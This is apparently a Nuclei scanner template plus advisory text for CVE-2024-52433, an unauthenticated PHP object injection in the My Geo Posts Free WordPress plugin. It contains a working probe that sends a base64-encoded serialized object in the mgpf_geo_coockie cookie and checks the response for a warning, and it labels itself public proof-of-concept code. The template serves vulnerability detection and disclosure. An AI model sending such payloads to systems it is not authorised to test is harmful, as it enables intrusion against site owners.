The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
PoC代码[已公开]
id: CVE-2024-52433
info:
name: My Geo Posts Free <= 1.2 - PHP Object Injection
author: s4e-io
severity: critical
description: |
The My Geo Posts Free plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.2 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
impact: |
Unauthenticated attackers can inject PHP objects via deserialization of the mgpf_geo_coockie cookie, which could lead to arbitrary file deletion, sensitive data retrieval, or code execution if a POP chain is present.
remediation: |
Update My Geo Posts Free plugin to a version later than 1.2 that addresses the insecure deserialization vulnerability.
reference:
- https://github.com/RandomRobbieBF/CVE-2024-52433
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/my-geo-posts-free/my-geo-posts-free-12-unauthenticated-php-object-injection
- https://patchstack.com/database/vulnerability/my-geo-posts-free/wordpress-my-geo-posts-free-plugin-1-2-php-object-injection-vulnerability?_s_id=cve
- https://nvd.nist.gov/vuln/detail/CVE-2024-52433
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-52433
cwe-id: CWE-502
epss-score: 0.81762
epss-percentile: 0.99156
cpe: cpe:2.3:a:mindstien:my_geo_posts_free:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: mindstien
product: my_geo_posts_free
framework: wordpress
tags: cve,cve2024,wordpress,wp,wp-plugin,my-geo-posts-free,php,injection,vuln
variables:
string: '{{rand_text_alpha(5)}}'
payload: 'O":20:"{{string}}":0:{}'
encrypt: '{{base64(payload)}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: mgpf_geo_coockie={{encrypt}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Warning", "mgpf_get_geo_location()", "{{encrypt}}")'
- "status_code == 200"
condition: and
# digest: 4a0a004730450220403f6c026ac695b41c71f6715dcd67e801f77bcd78e2885935e55d69283bdb27022100a6a6e05a172e59575fd3376bf7643a3b47e65940e05e050797f3de452971dc10:922c64590222798bb761d5b6d8e72950